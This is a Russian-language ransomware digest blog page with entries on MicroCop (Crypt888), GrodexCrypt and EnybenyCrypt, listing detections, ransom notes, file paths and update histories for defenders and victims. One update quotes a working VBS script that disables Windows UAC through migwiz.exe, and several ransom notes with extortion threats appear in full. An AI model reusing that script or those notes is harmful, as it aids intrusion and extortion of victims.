Шифровальщики-вымогатели The Digest "Crypto-Ransomware"

Шифровальщик (вирус-шантажист). Защита от программ-шифровальщиков. Как удалить вирус-шифровальщик?
Шифровальщики — это вредоносные программы, которые шифруют файлы и требуют выкуп за их расшифровку.
Данный сайт — это ДАЙДЖЕСТ и ПЕРВОИСТОЧНИК информации о шифровальщиках и всевозможных вымогателях.
Авторские статьи, инструкции для пострадавших, рекомендации по защите и профилактике угрозы Ransomware.

Показанные сообщения отсортированы по релевантности запросу "Crypt888". Сортировать по дате Показать все сообщения

среда, 29 июня 2016 г.

MicroCop

MicroCop Ransomware

Aliases: MirCop, Crypt888

MicroCop NextGen Ransomware

(шифровальщик-вымогатель)

Translation into English

Этот крипто-вымогатель шифрует файлы с помощью DES-шифрования, а затем требует вернуть якобы украденные 48,48 биткоинов. На самом деле банально вымогает выкуп. По сути это один из самых крупных выкупов в истории крипто-вымогательства последних лет. Имеет другое название: Crypt888. Написан на AutoIt.

Обнаружения:

DrWeb -> W97M.DownLoader.1560, Trojan.PWS.Siggen1.54140, Trojan.MulDrop5.13451, Trojan.Encoder.24597, Trojan.Bankfraud.3628

ALYac -> Dropped:Trojan.Generic.17350659, Trojan.Ransom.Crypt888

Avira (no cloud) -> HEUR/Macro.Agent, DR/AutoIt.Gen

BitDefender -> Generic.Ransom.Locked.3D08AF5C, AIT:Trojan.Nymeria.2448

ESET-NOD32 -> Win32/Spy.Banker.ADES, Multiple Detections, A Variant Of Win32/Filecoder.Crypt888.B

Malwarebytes -> Ransom.Microcop

Microsoft -> Ransom:Win32/Pocrimcrypt.A, Ransom:AutoIt/Lokmwiz.A

Rising -> Spyware.Banker!8.8D (CLOUD), Ransom.Lokmwiz!8.E16C*

Symantec -> Ransom.Cryptolocker, Ransom.CryptXXX

Tencent -> Win32.Trojan-banker.Agent.Wsan, Win32.Trojan-banker.Agent.Hrzc

TrendMicro -> Ransom_MIRCOP.G, Ransom_MIRCOP.H

К зашифрованным файлам добавляется не расширение, а приставка Lock. Таким образом зашифрованный файл выглядит так: Lock.original_name.png

Также приставка Lock. добавляется к папкам с файлами и к ярлыкам на Рабочем столе.

На скринлоке (графическом варианте записки о выкупе, который ставит обоями на рабочем столе файл wl.jpg), можно видеть фигуру в капюшоне и в маске Гая Фокса. Изображение позаимствовано у известной музыкальной группы Hacktivist, а текст просто заменен другим. Эту маску также использует хакерская группа Anonymous.

В конце записки приводится Bitcoin-адрес, на который нужно перевести сумму выкупа. Никаких инструкций для жертвы вымогательства не предоставляется. Видимо, предполагается, что в "век развитого компьютерного вымогательства" все уже должны знать, что такое биткоины, как их получать и переводить другим.

Текст со скринлока:
Hello.
You've stolen 48.48 BTC from the wrong people, please be so kind to return them and we will return your files.
Don't take us for fools, we know more about you than you know about yourself.
Pay us back and we won't take further action, don't pay and be prepared.
Bitcoin address...

Перевод на русский:
Привет.
Вы украли 48.48 BTC не у тех людей, потому будьте любезны вернуть их, и мы вернем ваши файлы.
Не считайте нас дураками, мы знаем о вас больше, чем вы знаете о себе.
Верните и мы тогда не зайдём дальше, не заплатите, будьте готовы.
Bitcoin-адрес...

Примечательно, что кроме биткоин-адреса для оплаты, вымогатели не дают пострадавшей стороне никаких контактов для связи.

Распространяется MirCop через email-спам с вложенным документом. Документ якобы от таможни Таиланда, который используется при импорте или экспорте товаров. В нем скрыт вредоносный макрос, который использует Windows PowerShell, чтобы выполнить загрузку собственно криптовымогателя. Злоумышленники используют специальный текст, запрашивающий разрешение на включение макросов для правильного отображения содержимого документа. Расcчитан на неопытных и излишне любопытных.

После полученного разрешения браузер пользователя перенаправляется на некий сайт магазина для взрослых на голландском языке, возможно давно взломанный, где размещены вредоносные файлы. Пока жертва его смотрит, на ПК начинается вредоносная деятельность: три файла загружаются в папку %TEMP%. Один из них, с именем c.exe, запускает процедуру, которая ворует пользовательскую информацию (логин-пароли из всех популярных браузеров, из FileZilla, Skype и другие данные). Два других, x.exe и y.exe, начинают шифрование файлов. В автозагрузку добавляется ярлык MicroCop.lnk, запускающий файл x.exe из директории Temp, выполняющий шифрование.

Как видно из скриншота выше, шифрованию подвержены файлы в пользовательских директориях: Рабочий стол, Музыка, Изображения, Видео, Документы, в том числе и в общих папках.

Файлы, связанные с MirCop Ransomware:
C:\Users\User-Name\AppData\Local\Temp\8x8x8
C:\Users\User-Name\AppData\Local\Temp\x.exe
C:\Users\User-Name\AppData\Local\Temp\y.exe
C:\Users\User-Name\AppData\Local\Temp\wl.jpg
C:\Users\User-Name\AppData\Local\VCGTUY.vBS
C:\Users\User-Name\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicroCop.lnk

Файлы, связанные с хищением паролей:
C:\Users\User-Name\AppData\Local\Temp\c.exe
C:\Users\User-Name\AppData\Local\Temp\putty.exe
C:\Users\User-Name\AppData\Local\PassW8.txt
C:\Users\User-Name\AppData\Local\Sqlite.dll
C:\Users\User-Name\AppData\Local\aut1.tmp

Записи реестра, связанные с MirCop Ransomware:
HKCU\Control Panel\Desktop\Wallpaper "%UserProfile%\AppData\Local\Temp\wl.jpg"

Вредонос определяется TrendMicro как RANSOM_MIRCOP.A
TrendMicro сокращает названия вредоносов до 6 букв. Так название ярлыка в автозагрузке MicroCop стало MIRCOP.

Записи реестра, связанные с этим Ransomware:

См. ниже результаты анализов.

Сетевые подключения и связи:

См. ниже результаты анализов.

Результаты анализов:

Гибридный анализ >>

VirusTotal анализ >> VT> VT> VT>

---

Гибридный анализ на файл PuTTY.exe >>
VirusTotal анализ на файл PuTTY.exe >>

Степень распространённости: средняя.

Подробные сведения собираются.

=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

Обновление от 14 ноября 2017:

Пост в Твиттере >>

Результаты анализов: VT

<< Скриншот записки

Обновление от 29 ноября 2017:

Пост в Твиттере >>
🎥 Видеообзор >> Спасибо GrujaRS!
Email: maya_157_ransom@hotmail.com
Использован: Private Builder Ransomware V2.01.exe
Результаты анализов: VT + HA
<< Комбо-скриншот с текстом о выкупе и файлами

Файлы: %TEMP%\888.vbs
%TEMP%\aut4724.tmp
%TEMP%\aut48A2.tmp
%TEMP%\aut48AD.tmp
%TEMP%\fuoodkv

=== 2020 ===

Обновление от 10 февраля 2020:
Пост в Твиттере >>
Расширение к файлам: .bhacks
Приставка к папкам: Lock.
Записка: 200 dollars.txt
Также используется изображение, заменяющее обои Рабочего стола.

Email: bhacks740@gmail.com
Файл EXE: kkk ransomware.exe
Результаты анализов: VT + VMR

Обновление от 29 июня 2020:

Приставка к файлам: Lock.

Email: j0ra@protonmail.com

Результаты анализов: VT + AR
Файл скрипта: 888.vbs
Файл изображения: wl.jpg

Обновление от 20 августа 2020:
Написан на AutoIt v3.
Пост в Твиттере >>
Мой пост в Твиттере >>
Приставка к файлам: Lock.
Записка: README.txt
Email: sp00f3rsupp0rt@protonmail.com
Файл скрипта: 888.vbs
Файл изображения: wl.jpg
Специальный файл: 8x8x8
Исполняемые файлы: kekw.exe, x.exe, migwiz.exe, reg.exe
Результаты анализов: VT + AR + IA
---

➤ Содержание файла README.txt:
Looks like your files have been encrypted.
Contact us: sp00f3rsupp0rt@protonmail.com
to decrypt your files have a nice day
---
Текст записки дублируется в экране блокировки, который появляется первым. Затем вместо обоев встает изображение с красными буквами на чёрном фоне.

---
➤ Содержание файла: 888.vbs
File = "C:\Windows\System32\cmd.exe"
Set shll = CreateObject("Wscript.Shell")
shll.run("C:\Windows\System32\migwiz\migwiz.exe " & File & " /c %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"),0,falseFile = "C:\Windows\System32\cmd.exe"
Set shll = CreateObject("Wscript.Shell")
shll.run("C:\Windows\System32\migwiz\migwiz.exe " & File & " /c %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"),0,false
---

Обновление от 28 ноября 2020:

Пост в Твиттере >>

По факту: Korean Crypt888

Самоназвания: HexadecimalDecryptor 1.0

Hexadecimal Ransomware Decryptor

Приставка к файлам: Lock.

Файлы изображений: wl.jpg, img0.jpg

Файлы: HexInformation.exe, HexDecryptor.exe, HexLocker.exe, WindowsSystemTools.exe

Результаты анализов: VT + TG + VMR

Вариант от 18 декабря 2020:

Сообщение >>

Самоназвание: Angry Lola Loud Ran$omware

Файлы: 888.vbs, wl.jpg

Файл: Angry Lola Loud Ran$omware.exe

Результаты анализов: VT + VMR

➤ Обнаружения:

DrWeb -> Trojan.Encoder.24597

ALYac -> Generic.Ransom.Locked.3D08AF5C

Avira (no cloud) -> TR/Bancker.8888

BitDefender -> Generic.Ransom.Locked.3D08AF5C

ESET-NOD32 -> Multiple Detections

Kaspersky -> HEUR:Exploit.Script.BypassUAC.gen

Kingsoft -> Win32.Troj.Banker.(kcloud)

Symantec -> Ransom.Cryptolocker

TrendMicro -> Ransom.AutoIt.CRYPTEIGHT.SMTH

=== 2021 ===

Варианты от 23-24 мая 2021:

Сообщение >>

Самоназвание: Project_Robux

Расширение: Lock.

---

Расширение: Lock.

---

Самоназвание: KarLocker

Расширение: Lock.

Ссылка на анализ >>

=== 2022 ===

Вариант от 22 мая 2022:

Сообщение >>

Расширение: Lock.

Результаты анализов: VT + AR

=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===

Внимание!
Для зашифрованных файлов есть дешифровщик (дешифратор).
Скачать дешифровщик для Crypt888 >>
*
*
*

 Read to links: 
 Tweet on Twitter
 ID Ransomware (ID as MirCop)
 Write-up, Topic of Support

 Thanks: 
 BleepingComputer, Michael Gillespie, Jakub Kroustek
 Andrew Ivanov (article author)
 и тем, кто присылает обновления

вторник, 30 мая 2017 г.

GrodexCrypt

GrodexCrypt Ransomware

(шифровальщик-вымогатель)

Этот крипто-вымогатель шифрует данные пользователей с помощью AES, а затем требует выкуп в $50 в BTC, чтобы вернуть файлы. Оригинальное название: GrodexCrypt. На файле написано: windir.exe.

шифровальщик вирус-шифровальщик троян-шифровальщик крипто-вымогатель удалить восстановить файлы расшифровка расшифровать дешифровать дешифрование дешифровка алгоритм crypto-ransomware virus-encoder key ransom decrypt decryption recovery remove restore decode files data public private

© Генеалогия: MicroCop (Crypt888) > GrodexCrypt

К зашифрованным файлам, как в прошлогоднем MicroCop, добавляется не расширение, а приставка Lock. — таким образом зашифрованный файл тоже выглядит так: Lock.original_name.png

Активность этого крипто-вымогателя пришлась на начало июня 2017 г. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру.

Запиской с требованием выкупа выступает экран блокировки:

Содержание записки о выкупе и FAQ:
1.
Your computer files have been encrypted. Your photos, videos, documents, etc....
But, don't worry! You can still save your files.
You have 48 hours to pay 50 USD in Bitcoins to get the decryption key.
After 48 all the files will be deleted and the decryption key will be destroyed.
If you do not have bitcoins Google the website buybitcoinworldwide or localbitcoins
Purchase 50 American Dollars worth of Bitcoins.
Send to the Bitcoins address specified.
Within minutes of receiving your payment your computer will receive the decryption application and return to normal.
Try anything funny and the decryption key will be destroyed along with your whole computer.
As soon as you have paid, please send email to STYSLA@PROTONMAIL.COM with your unique code: "7C8" as we receive the email we will send you the decryption application.
https://www.buybitcoinworldwide.com/

2.
Q: Is it possible to decrypt my files without paying?
A: No
Q: What if I try to remove this software?
A: Your decryption application will be destroyed and all of your files will be deleted
Q: What if I dont have bitcoins?
A: We have clear instructions how to buy bitcoins and send them to us.

Перевод записки и FAQ на русский язык:
1.

Твои компьютерные файлы были зашифрованы. Твои фотографии, видео, документы и т.д....
Но, не волнуйся! Ты можешь сохранить свои файлы.
У тебя есть 48 часов, чтобы заплатить $50 в биткоинах и получить ключ дешифрования.
После 48 все файлы будут удалены, а ключ дешифрования будет уничтожен.
Если у тебя нет биткоинов гугли на сайте buybitcoinworldwide или localbitcoins
Купи 50 долларов за биткоины.
Отправь на биткоин-адрес.
Через несколько минут после получения платежа ваш компьютер получит приложение для расшифровки и вернется в нормальное состояние.
Попробуешь пошутить и ключ дешифрования будет уничтожен вместе с твоим компьютером.
Как только ты заплатишь, отправь email на STYSLA@PROTONMAIL.COM со своим уникальным кодом: "7C8", когда мы получим email, мы пошлем тебе приложение дешифрования.

2.
Вопрос: Можно ли расшифровать мои файлы без оплаты?
Ответ: Нет
В.: Что будет, если я пытаюсь удалить эту программу?
О.: Твое приложение для дешифрования будет уничтожено и все твои файлы будут удалены.
В.: Что, если у меня нет биткоинов?
О.: У нас есть четкие инструкции, как купить биткойны и отправить их нам.

Распространяется путём взлом через незащищенную конфигурацию RDP или может распространяться с помощью email-спама и вредоносных вложений, обманных загрузок, эксплойтов, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

Список файловых расширений, подвергающихся шифрованию:
Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр.

Файлы, связанные с этим Ransomware:
windir.exe

Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

Сетевые подключения и связи:
STYSLA@PROTONMAIL.COM
См. ниже результаты анализов.

Результаты анализов:
Гибридный анализ >>
VirusTotal анализ >>
Другой анализ >>

Степень распространённости: низкая.
Подробные сведения собираются регулярно.

Внимание!
Для зашифрованных файлов есть декриптер
Скачать Crypt888Decrypter для дешифровки >>
Описание для Crypt888 >>
Декриптер общий для Crypt888 и GrodexCrypt.
Это просто разные версии одного и того крипто-вымогателя.

 Read to links: 
 Tweet on Twitter
 ID Ransomware
 Write-up, Write-up by Avast
 *

 Thanks: 
 Jakub Kroustek
 Lawrence Abrams
 *
 *

© Amigo-A (Andrew Ivanov): All blog articles.

ВНИМАНИЕ!
1) Ваши комментарии после статьи появятся только после проверки. Дублировать их не нужно.
2) В своём сообщение в форме обратной связи обязательно укажите название шифровальщика.

понедельник, 29 октября 2018 г.

EnybenyCrypt

EnybenyCrypt Ransomware

(шифровальщик-вымогатель)
Translation into English

Этот крипто-вымогатель шифрует данные пользователей с помощью AES-256, а затем требует выкуп в # BTC, чтобы вернуть файлы. Оригинальное название. На файле написано: EnybenyCrypt.exe или что попало. Среда разработки: Visual Studio 2010.

© Генеалогия: HiddenTear >> Scrabber, EnybenyCrypt, SnowPicnic, SymmyWare

К зашифрованным файлам добавляется расширение: .crypt888

Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом.

История версий: EnybenyCrypt > EnyBenyRevenge > EnyBenyHorsuke

Активность этого крипто-вымогателя пришлась на конец октября 2018 г. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру.

Записка с требованием выкупа называется: Hack.html

Содержание записки о выкупе:
Your files was encrypted with AES-256 Millitary Grade Encryption
Contact to rsupp@protonmail.ch or im flush your files to toilet and fuck using my dick!

Перевод записки на русский язык:
Ваши файлы были зашифрованы с помощью шифрования военного класса AES-256
Контакт по rupp@protonmail.ch или я смою ваши файлы в туалет и ***!

Технические детали

По сообщениям разработчика: никогда не распространялся через RDP.
Возможно, что в будущем может начать распространяться другими способами: с помощью фальшивых обновлений, перепакованных и заражённых инсталляторов, email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, веб-инжектов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1.

Список файловых расширений, подвергающихся шифрованию:
Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр.

Файлы, связанные с этим Ransomware:
EnybenyCrypt.exe
EnybenyCrypt.pdb - оригинальное название проекта
Hack.html
<random>.exe - случайное название
1234.jpg -> Hack.jpg

Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->
xxxx://fairybreathes.6te.net/1234.jpg
%USERPROFILE%\Documents\Visual Studio 2010\Projects\EnybenyCrypt\EnybenyCrypt\obj\x86\Release\EnybenyCrypt.pdb

Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

Сетевые подключения и связи:
URL:

Email: rupp@protonmail.ch
См. ниже в обновлениях другие адреса и контакты.
См. ниже результаты анализов.

Результаты анализов:
Ⓗ Hybrid анализ >>
𝚺 VirusTotal анализ >>
🐞 Intezer анализ >>
Ⓥ VirusBay образец >>
ⴵ VMRay анализ >>
ᕒ ANY.RUN анализ >>
👽 AlienVault анализ >>
🔃 CAPE Sandbox анализ >>
⨇ MalShare анализ >>
⟲ JOE Sandbox анализ >>

Степень распространённости: низкая.
Подробные сведения собираются регулярно.

=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===

Scrabber Ransomware
EnybenyCrypt Ransomware > EnyBenyRevenge > EnyBenyHorsuke
SnowPicnic Ransomware
SymmyWare Ransomware
и другие

=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

Обновление от 30 октября 2018:
Записка: Hack.html
Расширение: .suckmydick
➤ Содержание записки:
All your files have been encrypted with AES-256
You are not decrypt files before buy decryptor. Price: 0 bitcoins
Contact us: decryptscrabber@mail.ru
If you not buy - im flush your data TO TOILET!!!!!!
➤ Другой текст:
All your files have been encrypted with AES-256 Strong Encryption
You are not decrypt files before buy decryptor. Price: 0 bitcoins
Contact us: decryptscrabber@mail.ru (Please not abuse)
If you not buy - im flush your data TO TOILET!!!!!! + Your backups to normal windows deleted and YOUR BIOS PATCHED = System encrypted newerj
➤ Еще текст:
GREAT! CONGRULATIONS! YOU HAVE INSTALLED A DANGER RANSOMWARE IN WORLD (NOT) AND VIRUS WILL BE ENCRYPTING YOU DATA

➤ URLs:
URL-1: fairybreathes.6te.net
URL-2: e.freewebhostingarea.com
URL note: xxxx://fairybreathes.6te.net/1234.jpg

Email: scrabber@mail.ru
Результаты анализов: HA + HA + VT + IA

Обновление от 16 ноября 2018:
Пост в Твиттере >>
🎥 Видеобзор от CyberSecurity GrujaRS >>
Расширение: .EnyBenied
Самоназвание: ENYBENY REVENGE
Записка: ENYBENY.TXT + картинка ENYBENY.png
Email: filekerk@tutanota.com, yougame@protonmail.ch
Специальный файл: UniqueKEYForUser.EnyBenied.Information
Вместо слова User будет имя пользователя ПК.

Файл EXE: Cerber Ransomware Sourse.exe
Результаты анализов: VT + VMRay

➤ Содержание записки:
#######ENYBENY REVENGE#######
Great! You a member #Enybeny community, and all files have been encrypted!
Encryption - reversible modification,
created for protect all your files
You can buy decryptor - price 0.00000001 BTC
For decrypt contact with:
filekerk@tutanota.com
OR
yougame@protonmail.ch
Free decryption as guarantee (1 file, size not 1 mb)
And for free(or not) decryption please send file: UniqueKEYForUser.EnyBenied.Information
Please not delete this note!
Good luck.
And please check My Computer menu
#######ENYBENY REVENGE#######
P.S If you deletes all copies of key, after mailing ticket to Free (or not free) decryption,
(set text or subject:------BEGIN ENYBENY KEY-------7438383d7633XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX554a41.......END ENYBENY KEY

Обновление от 17 ноября 2018:
Пост в Твиттере >>
🎥 Видеобзор от CyberSecurity GrujaRS >>
Расширение: .Horsuke
Самоназвание: ENYBENY HORSUKE
Записки: Hack.TXT - текстовый файл
Hack.png - картинка
Hack.vbs - файл скрипта для запуска голосового сообщения
Email: swordofsakura@india.com, krupalupium@india.com
Специальный файл: UniqueKEYForUser.Horsuke.Information
Вместо слова Administrator будет имя пользователя ПК.

Файл EXE: Tron.exe

Результаты анализов: VT + HA + IA + AR + VMRay

➤ Содержание записки:
#######ENYBENY HORSUKE#######
Great! You a member #Enybeny community, and all files have been encrypted!
Encryption - reversible modification,
created for protect all your files
You can buy decryptor - price 0.00000001 BTC
For decrypt contact with:
swordofsakura@india.com
OR
krupalupium@india.com
Free decryption as guarantee (1 file, size not 1 mb)
And for free(or not) decryption please send file: UniqueKEYForUser.Horsuke.Information
Please not delete this note!
Good luck.
And please check My Computer menu
#######ENYBENY HORSUKE#######
P.S If you deletes all copies of key, create file \UniqueKEYForUser.Horsuke.Information contains:
------BEGIN ENYBENY KEY-------
4775696e536343584f463849766d4d722f6966373254713d3572783d37434f63202d2061646d696e202d205043
-------END ENYBENY KEY------

➤ Содержание VBS-записки:
Set SAPI = CreateObject("SAPI.SpVoice")
SAPI.Speak "Attention! Atention! Attention"
For i = 1 to 5
SAPI.Speak "If you hear this and you most likely saw your files with the new extension .bomber, so all your photos, music, documents, and databases were encrypted to AES 256 bit. Welcome to Enybeny Bomber."
Next
Перевод VBS-записки на русский язык:
Внимание! ВНИМАНИЕ! Внимание
Если вы это слышите, и вы, скорее всего, видели ваши файлы с новым расширением .bomber, поэтому все ваши фотографии, музыка, документы и базы данных были зашифрованы до 256 бит AES. Добро пожаловать в Enybeny Bomber.
Примечательно, что VBS-записка предназначалась для другой версии EnybenyBomber, или разработчик в последний момент передумал и назвал версию EnyBenyHorsuke.

Обновление от 17 ноября 2018:
Пост в Твиттере >>
🎥 Видеообзор >>
Самоназвание: EnyBeny Nuclear Ransomware (Wiper)
На файле написано: malwurhanrurtim
Файл проекта: malwurhanrurtim.pdb
Расширение не добавляется из-за ошибки с ":"
Расширение должно было быть: .PERSONAL_ID:<random>.Nuclear

Записки: Hack.TXT - текстовый файл
Hack.png - картинка
Специальный файл: UniqueKEYForUser.Nuclear.Information
Email: brianmaps@gmail.com, amigo_a@india.com
➤ Список файловых расширений: .7z, .asp, .aspx, .avi, .bc6, .bc7, .bkf, .bkp, .cas, .csv, .d3dbsp, .doc, .docx, .fos, .gdb, .gho, .hkdb, .hplg, .html, .hvpl, .ibank, .icxs, .itdb, .itl, .itm, .m4a, .map, .mdb, .mdbackup, .mddata, .mov, .mp4, .odt, .php, .pkpass, .png, .ppt, .pptx, .psd, .qdf, .qic, .rar, .sb, .sidd, .sidn, .sie, .sis, .sql, .sum, .svg, .syncdb, .t12, .t13, .tax, .txt, .vdf, .wma, .wmo, .wmv, .wotreplay, .xls, .xlsx, .xml, .zip, .ztmp (65 расширений).
Файл: malwurhanrurtim.exe
Результаты анализов: VT + HA + IA

➤ Содержание записки:
#######ENYBENY NUCLEAR#######
Great! You a member #Enybeny community, mutating completed and all your files has been encrypted!!
Encryption - reversible modification,
created for protect all your files
You can buy decryptor - price 0.00000001 BTC (No decryption, lol! Emails not registred!)
For decrypt contact with:
brianmaps@gmail.com
OR
amigo_a@india.com
Free decryption as guarantee (1 file, size not 1 mb)
And for free(or not) decryption please send file: UniqueKEYForUser.Nuclear.Information
Please not delete this note!
Good luck.
#######ENYBENY NUCLEAR#######
P.S If you deletes all copies of key, create file

Обновление от 3 ноября 2018:
Самоназвание: EnyBenyCristmas
Расширение: .personal.5RGR0X38VJHLELB.Cristmas@india_com
Шаблон расширения: .personal.<PC_name>.Cristmas@india_com
Записка: Hack.TXT
На файле написано: malwurhanrurtim
Файл проекта: malwurhanrurtim.pdb
Специальный файл: UniqueKEYForadmin.personal.5RGR0X38VJHLELB.Cristmas@india_com.info
Email: desktopmain228@india.com, care_nlm@tutamail.cc
Файл EXE: malwurhanrurtim.exe
Результаты анализов: VT + HA + IA + AR
➤ Содержание записки:
--*--*--*--|EnyBeny CRISTMAS|--*--*--*--
Great! You a member 2019 New year #Enybeny community
Encryption algorytm - AES-128 with unique 32 symbols, virus
created for protect all your files
You can buy decryptor - price 0.00000001 BTC
For decrypt contact with:
desktopman228@india.com
OR
care_nlm@tutamail.cc
Free decryption as guarantee (1 file, size not 1 mb)
And for free(or not) decryption please send file: UniqueKEYForadmin.personal.5RGR0X38VJHLELB.Cristmas@india_com.info
Please not delete this note!
Good luck.
--*--*--*--|EnyBeny CRISTMAS|--*--*--*--
P.S If you deletes all copies of key, create file UniqueKEYForadmin.personal.5RGR0X38VJHLELB.Cristmas@india_com.info contains:
------BEGIN ENYBENY KEY-------
38496e495e56352652737077697863706550784a6a32724e4e5e73494b596756202d2061646d696e202d20555345522d5043
-------END ENYBENY KEY------
Your personal id: 5RGR0X38VJHLELB

=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===

 Read to links: 
 Tweet on Twitter + myTweet 
 ID Ransomware (ID as HiddenTear)
 Write-up, Topic of Support
🎥  Video review >>

 - Видеообзор от CyberSecurity GrujaRS

 Thanks: 
 CyberSecurity GrujaRS
 Andrew Ivanov
 *
 *

Шифровальщики-вымогатели The Digest "Crypto-Ransomware"

среда, 29 июня 2016 г.

MicroCop

MicroCop Ransomware

Aliases: MirCop, Crypt888

MicroCop NextGen Ransomware

(шифровальщик-вымогатель)

Translation into English

вторник, 30 мая 2017 г.

GrodexCrypt

GrodexCrypt Ransomware

(шифровальщик-вымогатель)

понедельник, 29 октября 2018 г.

EnybenyCrypt

EnybenyCrypt Ransomware

(шифровальщик-вымогатель)
Translation into English

Постоянные читатели

My tweet feed

My profile on BC

Форма для связи / Contact

среда, 29 июня 2016 г.

MicroCop

MicroCop Ransomware

Aliases: MirCop, Crypt888

MicroCop NextGen Ransomware

(шифровальщик-вымогатель)

Translation into English

вторник, 30 мая 2017 г.

GrodexCrypt

GrodexCrypt Ransomware

(шифровальщик-вымогатель)

понедельник, 29 октября 2018 г.

EnybenyCrypt

EnybenyCrypt Ransomware

(шифровальщик-вымогатель) Translation into English

Постоянные читатели

My tweet feed

My profile on BC

Форма для связи / Contact

среда, 29 июня 2016 г.

вторник, 30 мая 2017 г.

понедельник, 29 октября 2018 г.

(шифровальщик-вымогатель)
Translation into English